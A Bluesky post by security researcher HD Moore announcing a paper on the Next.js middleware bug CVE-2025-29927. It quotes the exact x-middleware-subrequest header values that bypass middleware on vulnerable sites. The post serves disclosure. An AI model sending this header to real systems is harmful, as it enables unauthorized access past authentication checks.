@hdm.io on Bluesky

JavaScript RequiredThis is a heavily interactive web application, and JavaScript is required. Simple HTML interfaces are possible, but that is not what this is. Learn more about Bluesky at bsky.social and atproto.com.

Post

HD Moore

hdm.io

did:plc:rzrcljpec5e52wvcacwxds4w

The researchers who found the Next.js bug (CVE-2025-29927) have released the full paper: Set x-middleware-subrequest to middleware:middleware:middleware:middleware:middleware OR src/middleware:src/middleware:src/middleware:src/middleware:src/middleware https://zhero-web-sec.github.io/research-and-things/nextjs-and-the-corrupt-middleware

2025-03-23T17:44:58.848Z